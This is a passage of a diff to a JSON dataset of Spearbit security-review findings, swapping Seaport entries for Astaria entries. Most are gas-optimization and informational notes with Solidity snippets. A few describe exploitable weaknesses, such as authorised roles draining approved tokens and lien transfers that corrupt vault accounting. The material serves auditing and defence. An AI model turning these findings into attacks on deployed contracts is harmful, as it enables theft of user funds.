to the small number of consideration items (this actually happens inside _- prepareBasicFulfillmentFromCalldata).", + "title": "Cache VAULT().ROUTER().LIEN_TOKEN()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "leads to extra external calls.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "TypehashDirectory's constructor code can be optimized.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "TypehashDirectory's deployed bytecode in its current form is: 00 3ca2711d29384747a8f61d60aad3c450405f7aaff5613541dee28df2d6986d32 ; h_00 bf8e29b89f29ed9b529c154a63038ffca562f8d7cd1e2545dda53a1b582dde30 ; h_01 53c6f6856e13104584dd0797ca2b2779202dc2597c6066a42e0d8fe990b0024d ; h_02 a02eb7ff164c884e5e2c336dc85f81c6a93329d8e9adf214b32729b894de2af1 ; h_03 39c9d33c18e050dda0aeb9a8086fb16fc12d5d64536780e1da7405a800b0b9f6 ; h_04 1c19f71958cdd8f081b4c31f7caf5c010b29d12950be2fa1c95070dc47e30b55 ; h_05 ca74fab2fece9a1d58234a274220ad05ca096a92ef6a1ca1750b9d90c948955c ; h_06 7ff98d9d4e55d876c5cfac10b43c04039522f3ddfb0ea9bfe70c68cfb5c7cc14 ; h_07 bed7be92d41c56f9e59ac7a6272185299b815ddfabc3f25deb51fe55fe2f9e8a ; h_08 d1d97d1ef5eaa37a4ee5fbf234e6f6d64eb511eb562221cd7edfbdde0848da05 ; h_09 896c3f349c4da741c19b37fec49ed2e44d738e775a21d9c9860a69d67a3dae53 ; h_10 bb98d87cc12922b83759626c5f07d72266da9702d19ffad6a514c73a89002f5f ; h_11 e6ae19322608dd1f8a8d56aab48ed9c28be489b689f4b6c91268563efc85f20e ; h_12 6b5b04cbae4fcb1a9d78e7b2dfc51a36933d023cf6e347e03d517b472a852590 ; h_13 d1eb68309202b7106b891e109739dbbd334a1817fe5d6202c939e75cf5e35ca9 ; h_14 1da3eed3ecef6ebaa6e5023c057ec2c75150693fd0dac5c90f4a142f9879fde8 ; h_15 eee9a1392aa395c7002308119a58f2582777a75e54e0c1d5d5437bd2e8bf6222 ; h_16 c3939feff011e53ab8c35ca3370aad54c5df1fc2938cd62543174fa6e7d85877 ; h_17 0efca7572ac20f5ae84db0e2940674f7eca0a4726fa1060ffc2d18cef54b203d ; h_18 5a4f867d3d458dabecad65f6201ceeaba0096df2d0c491cc32e6ea4e64350017 ; h_19 80987079d291feebf21c2230e69add0f283cee0b8be492ca8050b4185a2ff719 ; h_20 3bd8cff538aba49a9c374c806d277181e9651624b3e31111bc0624574f8bca1d ; h_21 5d6a3f098a0bc373f808c619b1bb4028208721b3c4f8d6bc8a874d659814eb76 ; h_22 1d51df90cba8de7637ca3e8fe1e3511d1dc2f23487d05dbdecb781860c21ac1c ; h_23 for height 24", + "title": "s.currentEpoch can be cached in processEpoch()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "s.currentEpoch is being read from the storage multiple times in the processEpoch().", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "ConsiderationItem.recipient's absolute memory offset can be cached and reused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ConsiderationItem.recipient's absolute offset is calculated twice in the above context.", + "title": "Use basis points for ratios", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Fee ratios are represented through two state variables for numerator and denominator. Basis point system can be used in its place as it is simpler (denominator always set to 10_000), and gas efficient as denomi- nator is now a constant.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "currentAmount can potentially be reused when storing this value in memory in _validateOrdersAnd- PrepareToFulfill", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "We have considerationItem.startAmount = currentAmount; // 1 ... mload( // 2 add( considerationItem, ReceivedItem_amount_offset ) ) From 1 where considerationItem.startAmount is assigned till 2 its value is not modifed.", + "title": "liquidatorNFTClaim()'s arguments can be made calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following arguments can be converted to calldata to save gas on copying them to memory: function liquidatorNFTClaim( ILienToken.Stack memory stack, OrderParameters memory params, uint256 counterAtLiquidation ) external whenNotPaused {", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Information packed in BasicOrderType and how receivedItemType and offeredItemType are derived", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Currently the way information is packed and unpacked in/from BasicOrderType is inefficient. Basi- cOrderType is only used for BasicOrderParameters and when unpacking to give an idea how diffferent parameters are packed into this field.", + "title": "a.mulDivDown(b,1) is equivalent to a*b", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Highlighted code below the pattern of a.mulDivDown(b, 1) which is equivalent to a*b except the revert parameters in case of an overflow return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept);", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "invalidNativeOfferItemErrorBuffer calculation can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "We have: func sig ------------------------------------------------------------------------------ 0b10101000000101110100010 00 0000100 0b01010101100101000100101 00 1000010 0b11101101100110001010010 10 1110100 0b10000111001000000001101 10 1000001 ^ 9th bit matchOrders matchAdvancedOrders fulfillAvailableOrders fulfillAvailableAdvancedOrders", + "title": "try/catch can be removed for simplicity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following code catches a revert in the external call WETH.deposit{value: owning}() and then reverts itself in the catch clause try WETH.deposit{value: owing}() { WETH.approve(transferProxy, owing); // make payment lienToken.makePayment(stack); // check balance if (address(this).balance > 0) { // withdraw payable(msg.sender).transfer(address(this).balance); } } catch { revert(); } This effect can also be achieved without using try/catch which simplifies the code too.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "When accessing or writing to memory the value of an enum for a struct field, the enum's validation is performed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When accessing or writing to memory the value of an enum type for a struct field, the enum's validation is performed: enum Foo { f1, f2, ... fn } struct boo { Foo foo; ... } boo memory b; P(b.foo); // <--- validation will be performed to check whether the value of `b.foo` is out of range This would apply to OrderComponents.orderType, OrderParameters.orderType, CriteriaResolver.side, ReceivedItem.itemType, OfferItem.itemType, BasicOrderParameters.basicOrderType. ConsiderationItem.itemType, SpentItem.itemType,", + "title": "Cache s.idToUnderlying[collateralId].auctionHash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In liquidatorNFTClaim(...), s.idToUnderlying[collateralId].auctionHash is read twice from the storage.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "The zero memory slot can be used when supplying no criteria to fulfillOrder, fulfillAvailable- Orders, and matchOrders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When the external functions in this context are called, no criteria is passed to _validateAndFulfil- lAdvancedOrder, _fulfillAvailableAdvancedOrders, or _matchAdvancedOrders: new CriteriaResolver[](0), // No criteria resolvers supplied. When this gets compiled into YUL, the compiler updates the free memory slot by a word and performs an out of range and overflow check for this value: 34 function allocate_memory_() -> memPtr { memPtr := mload(64) let newFreePtr := add(memPtr, 32) if or(gt(newFreePtr, 0xffffffffffffffff), lt(newFreePtr, memPtr)) { panic_error_0x41() } mstore(64, newFreePtr) }", + "title": "Cache keccak256(abi.encode(stack))", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In LienToken._handleLiquidation(...) lienId is calculated as uint256 lienId = uint256(keccak256(abi.encode(stack))); Note that _handleLiquidation(...) is called by handleLiquidation(...) which has a modifier validateCol- lateralState(...): validateCollateralState( stack.lien.collateralId, keccak256(abi.encode(stack)) ) And thus keccak256(abi.encode(stack)) is performed twice. The same multiple hashing calculation also hap- pens in makePayment(...) flow. to cache the keccak256(abi.encode(stack)) value for the above", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders re- turns executions which is cleaned and validator by the compiler", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Currently, the return values of matchOrders, matchAdvancedOrders, fulfillAvailableAdvance- dOrders, fulfillAvailableOrders are cleaned and validator by the compiler.", + "title": "Functions can be made view or pure", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Several functions can be view or pure. Compiler also warns about these functions. For instance, _validateRequest() can be made view. getSeaportMetadata() can be made pure instead of view.", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "abi.encodePacked is used when only bytes/string concatenation is needed.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the context above, one is using abi.encodePacked like the following: 35 bytes memory B = abi.encodePacked( \"\", \"\", ... \"\" ); For each substring, this causes the compiler to use an mstore (if the substring occupies more than 32 bytes, it will use the least amount of mstores which is the ceiling of the length of substring divided by 32), even though multiple substrings can be combined to fill in one memory slot and thus only use 1 mstore for those.", + "title": "Fix compiler generated warnings for unused arguments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Several functions have arguments which are not used and compiler generates a warning for each instance, cluttering the output. This makes it easy to miss useful warnings. Here is one example of a function with unused arguments: function deposit( uint256 assets, address receiver ) { } public virtual override(ERC4626Cloned, IERC4626) onlyVault returns (uint256 shares) revert NotSupported();", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "solc ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "solc's ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent. That means all the parameters are cleaned and validated before they are provided to log3.", + "title": "Non-lien NFT tokens can get locked in the vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Both public and private vault when their onERC721Received(...) is called they return the IERC721Receiver.onERC721Received.selector and perform extra logic if the msg.sender is the LienToken and the operator is the AstariaRouter. This means other NFT tokens (other than lien tokens) received by a vault will be locked.", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "The use of identity precompile to copy memory need not be optimal across chains", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The PointerLibraries contract uses a staticcall to identity precompile, i.e., address 4 to copy memory--poor man's memcpy. This is used as a cheaper alternative to copy 32-byte chunks of memory using mstore(...) in a for-loop. However, the gas efficiency of the identity precompile relies on the version of the EVM on the underlying chain. The base call cost for precompiles before Berlin hardfork was 700 (from Tangerine Wistle), and after Berlin, this was reduced to 100 (for warm accounts and precompiles). Many EVM compatible L1s, and even L2s are on old EVM versions. And using the identity precompile would be more expensive than doing mstores(...).", + "title": "Validation checks should be performed at the beginning of processEpoch()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following validation check for the data corresponding to the current epoch happens in the middle of processEpoch() where there have already been some accounting done: if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); }", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Use the zero memory slot for allocating empty data", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In cases where an empty data needs to be allocated, one can use the zero slot. This can also be used as initial values for offer and consideration in abi_decode_generateOrder_returndata.", + "title": "Define and onlyOwner modifier for VaultImplementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following require statement has been used multiple times require(msg.sender == owner());", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Some address fields are masked even though the ConsiderationDecoder wanted to skip this mask- ing", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When a field of address type from a struct in memory is used, the compiler masks (also: 2, 3) it. struct A { address addr; } A memory a; // P is either a statement or a function call // when compiled --> and(mload(a_addr_pos), 0xffffffffffffffffffffffffffffffffffffffff) P(a.addr); Also the compiler is making use of function cleanup_address(value) -> cleaned { cleaned := and(value, 0xffffffffffffffffffffffffffffffffffffffff) } function abi_encode_address(value, pos) { mstore(pos, and(value, 0xffffffffffffffffffffffffffffffffffffffff)) } in a few places", + "title": "Vault is missing an interface", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Vault is missing an interface", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "div(x, (1< ds)(na + ns (cid:0) ds) is choosen so that order would not be overfilled. The parameters used in calculating (cid:15) are taken before they have been updated. Case 4. ds 6= 0, da 6= 1, da 6= ds (na, ns, da, ds) = (na (cid:0) (cid:15), na + ns (cid:0) (cid:15), ds, ds) Below (cid:15) = (nads + nsda > dads)(nads + nsda (cid:0) dads) is choosen so that order would not be overfilled. And in case the new values go beyond 120 bits, G = gcd(nads (cid:0) (cid:15), nads + nsda (cid:0) (cid:15), dads), otherwise G will be 1. The parameters used in calculating (cid:15), G are taken before they have been updated. (na, ns, da, ds) = 1 G (nads (cid:0) (cid:15), nads + nsda (cid:0) (cid:15), dads, dads) If one of the updated values occupies more than 120 bits, the call will be reverted.", + "title": "Elements' orders are not consistent in solidity files", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Elements' orders are not consistent in solidity files", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "The magic return value checks can be made stricter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The magic return value check for ZoneInteraction can be made stricter. 1. It does not check the lower 28 bytes of the return value. 2. It does not check if extcodesize() of the zone is non-zero. In particular, for the identity precompile, the magic check would pass. This is, however, a general issue with the pattern where magic values are the same as the function selector and not specific to the Zone.", + "title": "FileType definitions are not consistent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Both ICollateralToken.FileType and ILienToken.FileType start their enums with NotSupported. The definition of FileType in IAstariaRouter is not consistent with that pattern. This might be due to having 0 as a NotSupported so that the file endpoints would revert.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Resolving additional offer items supplied by contract orders with criteria can be impractical", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Contract orders can supply additional offer amounts when the order is executed. However, if they supply extra offer items with criteria, on the fly, the fulfiller won't be able to supply the necessary criteria resolvers (the correct Merkle proofs). This can lead to flaky orders that are impractical to fulfill.", + "title": "VIData.allowlist can transfer shares to entities not on the allowlist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "allowList is only used to restrict the share recipients upon mint or deposit to a vault if allowLis- tEnabled is set to true. These shareholders can later transfer their share to other users who might not be on the allowList.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Use of confusing named constant SpentItem_size in a function that deals with only ReceivedItem", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The named constant SpentItem_size is used in the function copyReceivedItemsAsConsidera- tionItems, even though the context has nothing to do with SpentItem.", + "title": "Extract common struct fields from IStrategyValidator implementations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "All the IStrategyValidator implementations have the following data encoded in the NewLienRe- quest.nlrDetails struct CommonData { uint8 version; address token; // LP token for Uni_V3... address borrower; ILienToken.Details lienDetails; bytes moreData; // depends on each implementation }", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "The ABI-decoding of generateOrder returndata does not have sufficient checks to prevent out of bounds returndata reads", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There was some attempt to avoid out of bounds returndata access in the ConsiderationDecoder. However, the two returndatacopy(...) in ConsiderationDecoder.sol#L456-L461 can still lead to out of bounds access and therefore may revert. Assume that code reaches the line ConsiderationDecoder.sol#L456. We have the following constraints 1. returndatasize >= 4 * 32: ConsiderationDecoder.sol#L428 2. offsetOffer <= returndatasize: ConsiderationDecoder.sol#L444 3. offsetConsideration <= returndatasize: ConsiderationDecoder.sol#L445 If we pick a returndata that satisfies 1 and let offsetOffer == offsetConsideration == returndatasize, all the constraints are true. But the returndatacopy would be revert due to an out-of-bounds read. Note: High-level Solidity avoids reading from out of bounds returndata. This is usually done by checking if re- turndatasize() is large enough for static data types and always doing returndatacopy of the form returndata- copy(x, 0, returndatasize()).", + "title": "_createLien() takes in an extra argument", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "_createLien(LienStorage storage s, ...) doesn't use s and hence can be removed as an argument.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Consider renaming writeBytes to writeBytes32", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The function name writeBytes is not accurate in this context.", + "title": "unchecked has no effect", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "unchecked only affects the arithmetic operations directly nested under it. In this case unchecked is unnecessary: unchecked { s.yIntercept = (_totalAssets(s)); s.last = block.timestamp.safeCastTo40(); }", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Missing test case for criteria-based contract orders and identifierOrCriteria != 0 case", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The only test case for criteria-based contract orders in advanced.spec.ts#L434. This tests the case for identifierOrCriteria == 0. For the other case, identifierOrCriteria != 0 tests are missing.", + "title": "Multicall can reuse msg.value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "A delegatecall forwards the same value for msg.value as found in the current context. Hence, all delegatecalls in a loop use the same value for msg.value. In the case of these calls using msg.value, it has the ability to use the native token balance of the contract itself for (uint256 i = 0; i < data.length; i++) { (bool success, bytes memory result) = address(this).delegatecall(data[i]); ... }", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "NatSpec comment for conduitKey in bulkTransfer() says \"optional\" instead of \"mandatory\"", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The NatSpec comment says that conduitKey is optional but there is a check making sure that this value is always supplied.", + "title": "Authorised entities can drain user assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "An authorized entity can steal user approved tokens (vault assets and vault tokens, ...) using these endpoints 58 function tokenTransferFrom( address token, address from, address to, uint256 amount ) external requiresAuth { ERC20(token).safeTransferFrom(from, to, amount); } function tokenTransferFromWithErrorReceiver( address token, address from, address to, uint256 amount ) external requiresAuth { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } Same risk applies to all the other upgradable contracts.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Comparing the magic values returned by different contracts are inconsistent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In ZoneInteraction's _callAndCheckStatus we perform the following comparison for the returned magic value: let magic := shr(224, mload(callData)) magicMatch := eq(magic, shr(224, mload(0))) But the returned magic value comparison in _assertValidSignature without truncating the returned value: if iszero(eq(mload(0), EIP1271_isValidSignature_selector))", + "title": "Conditional statement in _validateSignature(...) can be simplified/optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When validating the vault strategist's (or delegate's) signature for the commitment, we perform the following check if ( (recovered != strategist && recovered != delegate) || recovered == address(0) ) { revert IVaultImplementation.InvalidRequest( IVaultImplementation.InvalidRequestReason.INVALID_SIGNATURE ); } The conditional statement: (recovered != strategist && recovered != delegate) 59 perhaps can be optimised/simplified.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Document the structure of the TypehashDirectory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Instances of TypehashDirectory would act as storage contracts with runtime bytecode: [0x00 - 0x00] 00 [0x01 - 0x20] h(struct BulkOrder { OrderComponents[2] [0x21 - 0x40] h(struct BulkOrder { OrderComponents[2][2] ... [0xNN - 0xMM] h(struct BulkOrder { OrderComponents[2][2]...[2] tree }) tree }) tree }) 56 h calculates the eip-712 typeHash of the input struct. 0xMM would be mul(MaxTreeHeight, 0x20) and 0xNN = 0xMM - 0x1f.", + "title": "AstariaRouter cannot deposit into private vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The allowlist for private vaults only includes the private vault's owner function newVault( address delegate, address underlying ) external whenNotPaused returns (address) { address[] memory allowList = new address[](1); allowList[0] = msg.sender; RouterStorage storage s = _loadRouterSlot(); ... } Note that for private vaults we cannot modify or disable/enable the allowlist. includes the owner. It is always enabled and only That means only the owner can deposit into the private vault function deposit( uint256 amount, address receiver ) public virtual whenNotPaused returns (uint256) { VIData storage s = _loadVISlot(); require(s.allowList[msg.sender] && receiver == owner()); ... } If we the owner would like to be able to use the AstariaRouter's interface by calling its deposit(...), or de- positToVault(...) endpoint (which uses the pulling strategy from transfer proxy), it would not be able to. Anyone can directly transfer tokens to this private vault by calling asset() directly. So above requirement re- quire(s.allowList[msg.sender] ... ) seems to also be there to avoid potential mistakes when one is calling the ERC4626RouterBase.deposit(...) endpoint to deposit into the vault indirectly using the router.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Document what twoSubstring encodes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "We have: bytes32 constant twoSubstring = 0x5B325D0000000000000000000000000000000000000000000000000000000000; which encodes: cast --to-ascii 0x5B325D0000000000000000000000000000000000000000000000000000000000 [2]", + "title": "Reorganise sanity/validity checks in the commitToLien(...) flow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following checks are preformed in _validateRequest(...): params.lienRequest.amount == 0: if (params.lienRequest.amount == 0) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.AMOUNT_ZERO ); } The above check can be moved to the very beginning of the commitToLien(...) flow. Perhaps right before or after we check the commitment's vault provided is valid. newStack.lien.details.duration < s.minLoanDuration can be checked right after we compare to time to the second epoch end: if (publicVault.supportsInterface(type(IPublicVault).interfaceId)) { uint256 timeToSecondEpochEnd = publicVault.timeToSecondEpochEnd(); require(timeToSecondEpochEnd > 0, \"already two epochs ahead\"); if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } } if (lien.details.duration < s.minLoanDuration) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.MIN_DURATION_NOT_MET ); } This only works if we assume the LienToken.createLien(...) endpoint does not change the duration. The current implementation does not. block.timestamp > params.lienRequest.strategy.deadline can also be checked at the very beginning of the commitToLien flow.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Upper bits of the to parameter to call opcodes are stripped out by clients", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Upper bits of the to parameter to call opcodes are stripped out by clients. For example, geth would strip the upper bytes out: instructions.go#L674 uint256.go#L114-L121 So even though the to parameters in this context can have dirty upper bits, the call opcodes can be successful, and masking these values in the contracts is not necessary for this context.", + "title": "Refactor fetching strategyValidator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Both _validateCommitment(...) and getStrategyValidator(...) need to fetch strategyVal- idator and both use the same logic.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Remove unused functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The functions in the above context are not used in the codebase.", + "title": "The stack provided as an extra data to settle Seaport auctions need to be retrievable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The stack provided as an extra data to settle Seaport auctions need to be retrievable. Perhaps one can figure this from various events or off-chain agents, but it is not directly retrievable.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Fulfillment_itemIndex_offset can be used instead of OneWord", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the above context, one has: // Get the item index using the fulfillment pointer. itemIndex := mload(add(mload(fulfillmentHeadPtr), OneWord))", + "title": "Make sure CollateralToken is connected to Seaport v1.5", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Currently the CollateralToken proxy (v0) is connected to Seaport v1.1 which has different call- backs to the zone and it also only performs static calls. If the current version of CollateralToken gets connected to the Seaport v1.1, no one would be able to settle auctions created by the CollateralToken. This is due to the fact that the callbacks would revert.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Document how the _pauser role is assigned for PausableZoneController", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The _pauser role is an important role for a PausableZoneController. It can pause any zone created by this controller and thus transfer all the native token funds locked in that zone to itself.", + "title": "LienToken.transferFrom does not update a public vault's bookkeeping parameters when a lien is transferred to it.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When transferFrom is called, there is not check whether the from or to parameters could be a public vault. Currently, there is no mechanism for public vaults to transfer their liens. But private vault owners who are also owners of the vault's lien tokens, they can call transferFrom and transfer their liens to a public vault. In this case, we would need to make sure to update the bookkeeping for the public vault that the lien was transferred to. On the LienToken side, s.LienMeta[id].payee needs to be set to the address of the public vault. And on the PublicVault side, yIntercept, slope, last, epochData of VaultData need to be updated (this requires knowing the lien's end). However, private vaults do not keep a record of these values, and the corresponding values are only saved in stacks off-chain and validated on-chain using their hash.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "_aggregateValidFulfillmentConsiderationItems's memory layout assumptions depend on _val- idateOrdersAndPrepareToFulfill's memory manipulation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ceivedItem.recipient's offset of considerationItemPtr to write to receivedItem at offset (the same offset is also used here): _aggregateValidFulfillmentConsiderationItems are we In the Re- the same // Set the recipient on the received item. mstore( add(receivedItem, ReceivedItem_recipient_offset), mload(add(considerationItemPtr, ReceivedItem_recipient_offset)) ) looks buggy, This tion[i].endAmount with consideration[i].recipient: but in _validateOrdersAndPrepareToFulfill(...) we overwrite considera- mstore( add( considerationItem, ReceivedItem_recipient_offset // old endAmount ), mload( add( considerationItem, ConsiderationItem_recipient_offset ) ) ) in _fulfillAvailableAdvancedOrders and Also _validateOrdersAndPrepareToFulfill gets called first _matchAdvancedOrders. This is important since the memory for the consideration arrays needs to be updated before we reach _aggregateValidFulfillmentConsiderationItems. 59", + "title": "Anyone can take a valid commitment combined with a self-registered private vault to steal funds from any vault without owning any collateral", + "html_url": 